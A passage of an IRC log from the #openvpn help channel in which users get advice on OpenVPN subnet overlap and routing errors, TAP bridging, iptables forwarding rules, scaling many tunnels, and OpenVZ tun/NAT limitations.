/are/ the LAN IP ranges on my server-side that I want my clients to be able to get to. 09:58 < jgspratt> |Mike|: here is an updated server log from a restart with the simple CCD: http://hastebin.com/jocavaraba.vbs 09:58 <@vpnHelper> Title: hastebin (at hastebin.com) 10:06 < jgspratt> How do I correctly specify the openvpn settings for my network topology? 10:06 < |Mike|> !topology 10:07 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this. 10:07 < |Mike|> sorry, i'm a bit in a hurry here 10:07 < jgspratt> How can I avoid this network overlap problem but still be able to use openvpn to do something useful 10:08 < jgspratt> Is the server conf line `push "route 10.24.0.0 255.248.0.0"` correct or not? 10:09 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 10:09 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 260 seconds] 10:10 -!- Azrael808 [~peter@212.161.9.162] has quit [Client Quit] 10:11 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 10:13 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn 10:13 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host] 10:13 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 10:13 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 10:19 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 240 seconds] 10:21 -!- master_of_master [~master_of@p57B53BBC.dip.t-dialin.net] has quit [Ping timeout: 260 seconds] 10:23 -!- master_of_master [~master_of@p57B54741.dip.t-dialin.net] has joined #openvpn 10:31 < jgspratt> Is there a way to fix thisa? 10:37 < jgspratt> Can you use OpenVPN to make a "site-to-site" thingie? 10:47 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 10:47 -!- mode/#openvpn [+v s7r] by ChanServ 10:55 < jgspratt> anyone? 10:58 < chrisb> i use openvpn between a local host and a remote server 10:58 < jgspratt> chrisb: do you know what I'm doing wrong routing-wise? 10:58 -!- Halagan [~Miranda@a4.evona.ba.cust.gts.sk] has quit [Read error: Connection reset by peer] 10:58 <@ecrist> jgspratt: if you read the !routing page throughouly, it should resolve your issues 10:59 <@ecrist> otherwise, I may be able to help again later today 10:59 < jgspratt> ecrist: yep, I read all of that 11:00 < jgspratt> can you explain why I'm getting the routing conflict? 11:00 < chrisb> jgspratt: i only route from a single local private net 192.168.x.x to the remote 11:00 < jgspratt> what should my server.conf say? 11:01 < jgspratt> with http://hastebin.com/mubijulata.1c should 10.0.0.10 be able to get to 10.25.1.102? 11:01 <@vpnHelper> Title: hastebin (at hastebin.com) 11:01 < jgspratt> chrisb: I'm trying to make that one client work for now. 11:02 < chrisb> oh, i see, it looks like addresses overlap...fix that conflict or NAT somehow 11:03 < jgspratt> "fix it"--can you offer any suggestions on a valid config? 11:03 < jgspratt> I realize and accept that my config is wrong. Granted. How do I make it correct based on my topology? 11:04 < jgspratt> What I'm trying to tell the client is "10.24/13 is on the server's network, go through the VPN tunnel" 11:05 < jgspratt> What the error says to me is "Your VPN server is on your destination network: it is 10.25.1.101 and your network is 10.24/13, so, error, error, that's an overlap." 11:06 -!- gojafe [~rasengan@eyearesee.com] has joined #openvpn 11:07 < chrisb> right, overlap, 11:08 < jgspratt> But that's actually the point. I am bridging the LANs. 11:08 < jgspratt> I want the server to be on the destination network. 11:08 -!- raidz_away is now known as raidz 11:08 < chrisb> they are subnets, as you have defined them 11:09 < jgspratt> Can you offer a valid config? 11:10 < chrisb> i can tell you are in a hurry, so I won't slow you down 11:10 < jgspratt> No, I've been doing this for a day 11:11 < jgspratt> No rush. Just looking for someone with more info than "your server is on the network you're trying to get to." 11:12 < jgspratt> To me, it looks like http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing is telling me to do what I'm doing. 11:12 <@vpnHelper> Title: OpenVPN/Routing - Secure Computing Wiki (at www.secure-computing.net) 11:12 < chrisb> i have only used openvpn in one configuration local private network to remote vps, the bridge network, point-to-point is 10.x.x.x and then the vps routes to the public internet 11:12 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 11:14 < jgspratt> let's assume I'm trying to do that. how can I make it so my client can talk to my server network? 11:15 < jgspratt> Specifically, what should my server settings be so that I don't get an overlap problem, but so that openvpn does something useful? 11:16 <@EugeneKay> Move your client off the destination network. 11:16 <@EugeneKay> It's a circular route problem 11:17 <@EugeneKay> If they're not the same LAN then they shouldn't have the same subnet. Using a bridge is the wrong solution here. Change one of the subnets and set up routing between the two LANs, via the openvpn server/client 11:17 <@EugeneKay> !route 11:17 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 11:19 < chrisb> https://en.wikipedia.org/wiki/Private_network#Merging_private_networks 11:19 <@vpnHelper> Title: Private network - Wikipedia, the free encyclopedia (at en.wikipedia.org) 11:20 < jgspratt> EugeneKay: Move my client? It is on 10.0.0.0/24 for eth0 and 172.16.0.0/24 for tun0 11:20 < jgspratt> Neither of those ranges are on the server's LAN 11:21 <@EugeneKay> The client thinks there's an overlap 11:21 < jgspratt> 10.24.0.0/13 is not on 10.0.0.0/24 11:21 <@EugeneKay> Are you sure it's actually /24? ;-) 11:22 < chrisb> jgspratt: check the bits 11:22 < jgspratt> Yeah. 11:22 < jgspratt> Ok, on what? 11:22 < jgspratt> iroute 10.0.0.0 255.255.255.0 11:22 < jgspratt> push "route 10.0.0.0 255.255.255.0" 11:22 < jgspratt> route 10.0.0.0 255.255.255.0 11:22 < jgspratt> That's /24 11:23 <@EugeneKay> Your error message says otherwise 11:23 <@EugeneKay> I see the warning "WARNING: potential route subnet conflict between local LAN [10.25.1.0/255.255.255.0] and remote VPN [10.24.0.0/255.248.0.0]" 11:23 < chrisb> jgspratt: you are the one with the routing problem 11:23 <@EugeneKay> Something isn't right there. Go fix it. 11:23 < chrisb> jgspratt: you couldn't route these with a regular router! 11:23 < jgspratt> The server can't be on the server's lan? 11:24 <@EugeneKay> Your VPN subnet should not be within any LAN subnet.... 11:24 <@EugeneKay> It should be a whole different block 11:24 < jgspratt> It's not. The tun interfaces are on 172.16.0.0/24 11:24 <@EugeneKay> Then what is 10.25.1.0/24? 11:25 < jgspratt> Part of 10.24.0.0/13, the server's LAN 11:25 < chrisb> oh mygod 11:25 <@EugeneKay> Is that error message from the server or the client? I'm confused 11:25 -!- chrisb [~chrisb@li482-205.members.linode.com] has left #openvpn ["rcirc on GNU Emacs 23.4.1"] 11:25 <@EugeneKay> And you can't have a /24 that's "part of" a /13. This is not how CIDR works. 11:26 <@EugeneKay> It's either a conflict or it's a different block 11:26 <@EugeneKay> Fix it. 11:26 < jgspratt> No, that's on the server's log 11:27 <@EugeneKay> So, why does the server think that 10.24.0.0/13 is a block that openvpn should be handling? ;-) 11:27 -!- arekm [~arekm@pld-linux/arekm] has joined #openvpn 11:27 < jgspratt> Well, I'll simplify it to only be 10.25.0.0/24 on the east coast for now then. 11:27 < jgspratt> The server can get to all of 10.24/13 11:28 <@EugeneKay> So you have the server push that route to clients. The server itself shouldn't be gtting that route via openvpn, because that's wrong 11:28 < arekm> hi. I wonder what could change between 2.2.2 and 2.3.0 that causes "write UDPv4: Invalid argument (code=22)" with exactly the same config 11:29 <@EugeneKay> If openvpn isn't going to be handling a block, don't tell it about it. 11:30 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 264 seconds] 11:30 < jgspratt> here, I simplified it: http://hastebin.com/damayulotu.vbs 11:30 <@vpnHelper> Title: hastebin (at hastebin.com) 11:31 < jgspratt> That's the server log now, with only 10.25/24 on the server 11:31 < jgspratt> "potential route subnet conflict between local LAN [10.25.1.0/255.255.255.0] and remote VPN [10.25.0.0/255.255.0.0]" 11:31 <@EugeneKay> !configs 11:31 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 11:32 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.] 11:32 < jgspratt> http://hastebin.com/kavurivaca.hs 11:32 <@vpnHelper> Title: hastebin (at hastebin.com) 11:32 <@EugeneKay> Line 13 is wrong 11:32 <@EugeneKay> That should not exist 11:32 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 11:32 <@EugeneKay> So you have the server push that route to clients. The server itself shouldn't be gtting that route via openvpn, because that's wrong 11:32 < jgspratt> Sorry, I put that in per someone else's request from a while ago. 11:33 <@EugeneKay> If your server has the route via a LAN adapter openvpn will notice the conflict. Which it did. 11:33 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 11:33 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Client Quit] 11:34 -!- Konigsberg [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Quit: 123asdf] 11:34 < jgspratt> Here is with that line removed: http://hastebin.com/focetuhiku.vbs 11:34 <@vpnHelper> Title: hastebin (at hastebin.com) 11:35 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 11:35 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 11:35 < jgspratt> Same symptoms on client: http://hastebin.com/posuqiresa.hs 11:35 <@vpnHelper> Title: hastebin (at hastebin.com) 11:35 <@EugeneKay> See? No more conflict. Now you get to fix the next problem. 11:35 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 11:35 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 11:35 -!- _fang0654 [~fang0654@cpe-68-174-236-234.nyc.res.rr.com] has joined #openvpn 11:35 < jgspratt> I didn't have the conflict before I added that line, but they said it wouldn't work without it, so I should add it. 11:36 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 11:36 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 11:36 <@EugeneKay> Whoever said that was wrong 11:36 < jgspratt> But I'm glad we are making progress now! :) 11:36 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 11:36 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Remote host closed the connection] 11:36 <@EugeneKay> This looks like a routing problem now. I'm guessing 10.25.1.101 is the server's LAN address, and .102 is another box on that same LAN? 11:36 <@EugeneKay> And that your server is NOT the default gw for most boxes on that same LAN? 11:36 < arekm> for my problem with Invalid argument 22 here is config, data, logs: http://pastebin.com/qUMLUm9r 11:37 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 11:37 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 11:37 < jgspratt> Well, should I be able to go from .102 to 10.0.0.10 if it's as you suspect? 11:37 -!- Konigsberg7 [~mIRC@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 11:37 -!- Konigsberg7 [~mIRC@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 11:38 <@EugeneKay> Nope 11:38 -!- Konigsberg7 [~mIRC@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 11:38 -!- Konigsberg7 [~mIRC@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 11:38 < jgspratt> But I added a route: http://hastebin.com/lamoboweca.vhdl 11:38 <@vpnHelper> Title: hastebin (at hastebin.com) 11:38 <@EugeneKay> On your default GW? OK, so that's good. 11:39 < jgspratt> In my sonicwall: http://hastebin.com/hokocahine.1c 11:39 <@vpnHelper> Title: hastebin (at hastebin.com) 11:39 <@EugeneKay> If pings are working one direction but not the other then it's gonna be a firewall 11:39 < jgspratt> Yeah, which is the default GW 11:39 < _fang0654> Probably a stupid question, but does broadcast traffic get passed over a TAP vpn? 11:39 <@EugeneKay> And I charge $150/hour to debug those 11:40 <@EugeneKay> _fang0654 - Layer2 traffic is passed over TAP, yes. Are you talking about bridging tap0 to eth0? Don't do that. 11:40 -!- Konigsberg7 [mIRC@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 11:40 -!- Konigsberg7 [mIRC@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 11:41 < _fang0654> EugeneKay: Ok cool. Just set up a bridge between two tomato routers to be on the same subnet, just wanted to make sure their poorly designed software would work 11:41 <@EugeneKay> Good luck. You'll need it. :-p 11:41 -!- staticsafe [~staticsaf@unaffiliated/staticsafe] has quit [Ping timeout: 255 seconds] 11:41 < _fang0654> Seems like it is working. Pretty slow though. Very poorly designed software :) 11:43 < arekm> any clues, things to check? 11:43 <@EugeneKay> arekm - not a clue. 11:44 < jgspratt> EugeneKay: I doubt it. These machines were running this very vpn for over a year. 11:44 <@EugeneKay> But bravo for trying 2.3! 11:44 < arekm> heh, ok, so no point in trying to debug this, downgrading :) 11:45 <@EugeneKay> Plenty of point; it's probably something obvious 11:45 <@EugeneKay> But I have $DAYJOB too 11:45 < arekm> downgraded and works 11:45 <@EugeneKay> A valid solution too 11:46 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has joined #openvpn 11:46 < arekm> tried to see where "Invalid argument" is comming from via strace but likely it's not from any syscall 11:47 <@EugeneKay> Nah, it'll be an openvpn debug thing 11:47 <@EugeneKay> It's not one I've come across(or can remember) or I'd tell you what it means 11:47 <@EugeneKay> Googling probably isn't much help(I tried) 11:49 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 11:49 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 11:49 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 11:49 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 11:49 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 11:49 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 11:49 -!- Konigsberg [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 11:50 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 11:51 < arekm> UDPv4 write returned -1 11:51 < arekm> oh 11:51 -!- staticsafe [~staticsaf@unaffiliated/staticsafe] has joined #openvpn 11:55 < arekm> (2.3 client works fine btw, only server has problems) 11:56 -!- Konigsberg [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Quit: 123asdf] 11:59 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 11:59 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 12:03 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 12:03 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 12:03 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 12:07 -!- valparaiso_ [~valparais@ARennes-257-1-179-35.w2-13.abo.wanadoo.fr] has joined #openvpn 12:08 -!- valparaiso_ is now known as valparaiso 12:09 -!- Konigsberg [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 12:16 <@ecrist> what problem does server have? 12:16 -!- Konigsberg [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has left #openvpn [] 12:17 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 12:17 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 12:21 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 12:26 -!- BtbN [~btbn@btbn.de] has quit [Quit: Bye] 12:27 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Quit: 123asdf] 12:27 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 12:27 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 12:29 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 12:29 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 12:29 -!- BtbN [~btbn@btbn.de] has joined #openvpn 12:30 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 12:30 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 12:36 < _fang0654> Any way of having a tap tunnel intercept DHCP and not pass the requests to the other side of the tunnel? 12:37 <@EugeneKay> Yeah, don't use bridging. :-p 12:37 <@EugeneKay> I think you can do that with ebtables/iptables 12:38 -!- MarKsaitis [~MarKsaiti@82-71-61-117.dsl.in-addr.zen.co.uk] has joined #openvpn 12:38 < _fang0654> I'd love to not use bridging, but software only works on same subnet 12:38 -!- ch1mk3y [ch1m@ns203993.ovh.net] has joined #openvpn 12:38 < _fang0654> ok. I'll see if I can get more with my google fu. Mainly just trying to have a different default gateway assigned 12:39 -!- CEnnis91|Cloud [uid3543@gateway/web/irccloud.com/x-pzipuahktqrozmve] has quit [Quit: Connection closed for inactivity] 12:39 < _fang0654> Although it is only a handful of machines. I think I'll just set them up static and be done with it 12:40 < JackWinter> is there a more specific directive than client-client, to only allow select hosts to see each other? 12:40 < _fang0654> JackWinter: You have to do that through iptables on the server 12:41 -!- ch1mkey [ch1m@ns203993.ovh.net] has quit [Ping timeout: 276 seconds] 12:43 < JackWinter> _fang0654: was afraid of that. does a forward rule cover traffic on the same interface or is it only for forwarding between different interfaces? 12:43 -!- ch1mkey [ch1m@ns203993.ovh.net] has joined #openvpn 12:44 -!- ch1mkey [ch1m@ns203993.ovh.net] has quit [Read error: Connection reset by peer] 12:44 -!- ch1mkey [ch1m@ns203993.ovh.net] has joined #openvpn 12:44 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 255 seconds] 12:45 <+pekster> JackWinter: Traffic can be forwarded even if it arrives and leaves via the same interface, yes 12:45 -!- ch1mk3y [ch1m@ns203993.ovh.net] has quit [Ping timeout: 248 seconds] 12:46 < _fang0654> JackWinter: Hold on one sec, let me look at how my rules are configured 12:46 -!- ch1mk3y [ch1m@ns203993.ovh.net] has joined #openvpn 12:48 -!- ch1mkey [ch1m@ns203993.ovh.net] has quit [Ping timeout: 248 seconds] 12:49 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:51 <+pekster> _fang0654: I assume you're already ruled out using a tun (Layer 3) VPN setup instead? You actually need subnet broadcast and/or Ethernet frame support across the tunnel? 12:52 < _fang0654> pekster: Yeah, on this one. I seem to have it up and running fine, I'm just going to keep things simple and keep the workstations static 12:54 < _fang0654> JackWinter: Here is an example iptables setup I have for a specific client to only be able to access specific machines - http://pastebin.com/BxjGQFbn 12:58 -!- ch1mkey [ch1m@ns203993.ovh.net] has joined #openvpn 13:00 -!- ch1mk3y [ch1m@ns203993.ovh.net] has quit [Ping timeout: 255 seconds] 13:01 < JackWinter> _fang0654: thanks 13:02 <+pekster> I don't see the point of lines 8-9; you could just DROP the traffic there. Presumably early on in your FORWARD chain you're already accepting the established & related states, so there's no point to doing it there 13:03 -!- ch1mk3y [ch1m@ns203993.ovh.net] has joined #openvpn 13:05 -!- ch1mkey [ch1m@ns203993.ovh.net] has quit [Ping timeout: 252 seconds] 13:08 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 13:13 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 240 seconds] 13:14 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 13:18 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 13:22 < _fang0654> pekster: I had default set to drop. 13:24 -!- BtbN [~btbn@btbn.de] has quit [Read error: Connection reset by peer] 13:25 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has quit [Quit: Dieser Computer ist eingeschlafen] 13:25 <+pekster> _fang0654: So? You should be accepting the established/related states early in forward, not for each source address you custom filter 13:25 -!- BtbN [~btbn@btbn.de] has joined #openvpn 13:25 <+pekster> Unless you have some special need, the first rule in any of the builtin chains should probably be -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT 13:26 < _fang0654> pekster: Good point. I built the setup years ago, and haven't really touched it since. I think when I get some free time I'll update it 13:27 < _fang0654> pekster: Definitely makes more sense 13:28 <+pekster> It's just less CPU processing the kernel needs to do, becuase those rules are hit for every packet. I could also run around the block every glass of water I pour myself, but I don't ;) 13:29 < _fang0654> lol 13:29 < _fang0654> I'm actually kind of amazed at how well openvpn holds up running a lot of vpns 13:29 -!- jgspratt [~jgspratt@66.162.71.166] has left #openvpn ["PONG :hubbard.freenode.net"] 13:29 < _fang0654> I have a virtual machine running about 50 tunnels without breaking a sweat 13:29 <@dazo> _fang0654: you probably haven't tried a few hundred active tunnels ;-) 13:29 <+pekster> Concurrent processes, yes. It's not multi-threaded, so that surprisees some people with 16-virtual cores or something when they can't leverage them all on a single tunnel 13:29 <@dazo> but 50ish should be really fine 13:30 < _fang0654> dazo: I figure when I hit 64 I'll just set up a new instance 13:30 <+pekster> The solution there is to use multiple backend VPNs and tie them together with some load-balancing at the front; if you set something like that up right, it's mostly transparent to frontend users 13:30 < _fang0654> pekster: Makes sense.. especially since I only gave it a core :) 13:31 < _fang0654> pekster: It is mainly our clients, who for the most part aren't dealing with each other, so it doesn't matter if we split it up 13:31 <@dazo> _fang0654: you can easily run more openvpn servers on different ports on the same box ... and then pin them to different CPU cores ... but I would easily raise the bar to 100 simultaneous and active clients 13:32 < _fang0654> dazo: To be honest, I was a bit shortsighted when I first set it up. I'm going to run out of IPs before then and have to set up another server anyways :) 13:32 <@dazo> nah ... just reconfigure the VPN subnet ... that should be enough, or not? 13:33 < _fang0654> I'd have to do it late at night, since I can't keep it down for very long 13:34 <@dazo> fair enough 13:34 < _fang0654> I tried it once, ran into a couple of snags, backed out and shelved it to be handled at some later point 13:35 < _fang0654> Well, now I have to call the cable company to up the upstream bandwidth at this office. Apparently it's only 2Mbit up, which is killing their software 13:35 < _fang0654> thanks for the advice! 13:36 <@dazo> well, I'd set up a clone VM of my prod environment, rename it to 'testing' ... and do all the needed testing there ... and copy the config files 13:36 -!- _fang0654 [~fang0654@cpe-68-174-236-234.nyc.res.rr.com] has quit [Quit: Leaving] 13:38 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has quit [Quit: Leaving] 13:38 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 13:40 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has joined #openvpn 13:41 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 13:48 -!- b00b [~freenode@46.166.178.155] has quit [Quit: ZNC - http://znc.in] 13:52 -!- Typo1 [~raul@63-234-144-202.dia.static.qwest.net] has joined #openvpn 13:55 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 14:05 -!- dazo is now known as dazo_afk 14:09 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 265 seconds] 14:10 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 14:13 -!- MarKsaitis [~MarKsaiti@82-71-61-117.dsl.in-addr.zen.co.uk] has quit [Ping timeout: 276 seconds] 14:18 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 14:21 -!- Suterusu1 [~EyeR@178.63.199.61] has quit [Ping timeout: 260 seconds] 14:25 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 14:26 -!- Devastator [~devas@177.18.197.67] has joined #openvpn 14:26 -!- Devastator [~devas@177.18.197.67] has quit [Changing host] 14:26 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 14:31 -!- CEnnis91|Cloud [uid3543@gateway/web/irccloud.com/x-glexqzbkdqwtzqzv] has joined #openvpn 14:34 -!- CEnnis91|Cloud is now known as CEnnis91 14:34 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-glexqzbkdqwtzqzv] has quit [Changing host] 14:34 -!- CEnnis91 [uid3543@unaffiliated/cennis91] has joined #openvpn 14:34 -!- CEnnis91 [uid3543@unaffiliated/cennis91] has quit [Changing host] 14:34 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-glexqzbkdqwtzqzv] has joined #openvpn 14:37 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 14:49 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 14:58 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has joined #openvpn 15:10 -!- brute11k [~brute11k@89.249.235.33] has quit [Quit: Leaving.] 15:15 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 248 seconds] 15:20 -!- troyt [~troyt@2001:1938:240:3000::3] has quit [Ping timeout: 260 seconds] 15:21 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection] 15:21 -!- valparaiso [~valparais@ARennes-257-1-179-35.w2-13.abo.wanadoo.fr] has quit [Quit: valparaiso] 15:28 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 15:45 < CrashTM> anyone home? 15:49 -!- pa [~pa@unaffiliated/pa] has quit [Quit: Sto andando via] 15:51 -!- Typo1 [~raul@63-234-144-202.dia.static.qwest.net] has quit [Quit: Leaving.] 15:53 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 16:01 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 276 seconds] 16:03 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 16:12 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 246 seconds] 16:15 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 16:16 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.225.wb.wifirst.net] has joined #openvpn 16:17 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 276 seconds] 16:25 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn 16:27 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving] 16:30 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 16:37 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 17.0.1/20121128204232]] 16:52 -!- Crosshair84 [~Crosshair@nat.crossfone.com.ar] has joined #openvpn 16:52 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 255 seconds] 16:52 -!- fu_fu is now known as desmo 16:52 < Crosshair84> hello I'm a new user and im looking for help 16:52 -!- bjh4_ [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn 16:53 < desmo> crashTM what's up 16:55 < CrashTM> desmo, im having trouble setting up a openvpn server on my vz based ubuntu vps 16:55 < desmo> whats the trouble? 16:56 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:56 <+pekster> OpenVZ isn't going to give you direct control over tun devices like you expect 16:56 <+pekster> Try a real shell ;) 16:56 < CrashTM> Well at first it was that tun/tap was not enabled but i got that fixed, now it tells me that the ip_tables module is not found when i try to configure it 16:57 <+pekster> !openvz 16:57 <@vpnHelper> "openvz" is (#1) http://wiki.openvz.org/VPN_via_the_TUN/TAP_device to learn bout openvz specific stuff with regards to openvpn or (#2) It is usually less painful to switch to a host with better virtualization technology, eg Xen. 16:57 -!- desmo is now known as fu_fu 16:57 < CrashTM> so i contacted the host, they said that it was also enabled and running for other clients 16:57 <+pekster> Or: 16:57 <+pekster> !openvzlinnat 16:57 <@vpnHelper> "openvzlinnat" is since openvz cant do NAT inside containers, use iptables -t nat -A PREROUTING -i tun0 -j DNAT --to-destination 16:57 <+pekster> !openvznat 16:57 <@vpnHelper> "openvznat" is (#1) a user reported success with this command: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -j SNAT --to or (#2) someone else got it working with: iptables -t nat -A POSTROUTING -s / -o eth -j SNAT --to 16:57 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has quit [Ping timeout: 260 seconds] 16:57 <+pekster> There's some 